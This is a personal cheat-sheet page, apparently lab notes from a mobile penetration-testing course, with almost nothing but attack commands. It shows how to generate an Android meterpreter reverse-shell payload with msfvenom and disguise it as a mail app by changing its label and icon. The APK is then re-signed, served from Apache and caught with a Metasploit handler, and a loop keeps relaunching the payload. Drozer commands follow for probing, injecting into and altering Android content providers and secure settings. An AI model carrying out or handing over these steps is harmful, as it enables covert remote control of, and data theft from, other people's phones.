RTFM for mobiles


# For Android Tamer:

install metasploit, zipalign and apache2

# for stager

msfvenom --platform android --arch dalvik -p android/meterpreter/reverse_tcp LHOST= LPORT=8888 -f raw -o mail.apk

# for inline (worked for Samsung DUOS)

msfvenom --platform android --arch dalvik -p android/meterpreter_reverse_tcp LHOST= LPORT=4444 -f raw -o mail.apk

apktool d mail.apk

cd mail/res/values

nano strings.xml

MainActivity --> Mail


cd ..

mkdir mipmap

copy icon to /res/mipmap/


<application android:label="@string/app_name" android:icon="@mipmap/mail">

apktool b mail -o mail_temp.apk

keytool -genkey -v -keystore eccouncil.Keystore -alias pentestandroid -keyalg RSA -keysize 2048 -validity 10000

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore eccouncil.Keystore mail_temp.apk pentestandroid

sudo su -

zipalign -fv 4 mail_temp.apk /var/www/html/mail.apk

What for? zipalign is an archive alignment tool that provides important optimization to Android application (APK) files. The purpose is to ensure that all uncompressed data starts with a particular alignment relative to the start of the file. Specifically, it causes all uncompressed data within the APK, such as images or raw files, to be aligned on 4-byte boundaries. This allows all portions to be accessed directly with mmap() even if they contain binary data with alignment restrictions. The benefit is a reduction in the amount of RAM consumed when running the application.

service apache2 start


use exploit/multi/handler

set payload android/meterpreter/reverse_tcp


set LPORT 8888


set exitonsession false


When connected to meterpreter on the remote Android:


while true

do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

sleep 60


In meterpreter

upload /home/android/Downloads/Lab3.4/bc.sh /sdcard


cd /sdcard

sh bc.sh

SHOULD SEE SMTH LIKE THIS: Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity launchParam=MultiScreenLaunchParams { mDisplayId=0 mFlags=0 } }

mount -o remount, rw /mnt



adb push and chmod

tcpdump -v -s 0 -w eccouncil.pc

tcpdump -v -s 0 -w com.bssys.mbcphone.)))


adb forward tcp:31415 tcp:31415

drozer console connect

run app.package.list

run app.package.info -a [package_name]

run app.package.manifest [package_name]

run app.package.attacksurface[package_name]

run app.activity.info -a [package_name]

run app.activity.start --component [package_name]


run app.package.info -a [package_name]

run scanner.provider.finduris -a [package_name]

run app.provider.query content://[URI_to_the_content]

run app.provider.query content:// [package_name].[provider_name] --vertical

run scanner.provider.injection -a com.android.insecurebankv2

run app.provider.insert content://com.vulnerable.im/messages

--string date 1331763850325

--string type 0

--integer _id 7

run app.provider.update content://settings/secure

--selection "name=?"

--selection-args assisted_gps_enabled

--integer value 0

run app.provider.delete content://settings/secure

--selection "name=?"

--selection-args my_setting

run app.broadcast.info -a com.android.insecurebankv2

Russian Federation, somewhere in Moscow
Powered by Webnode
Create your website for free! This website was made with Webnode. Create your own for free today! Get started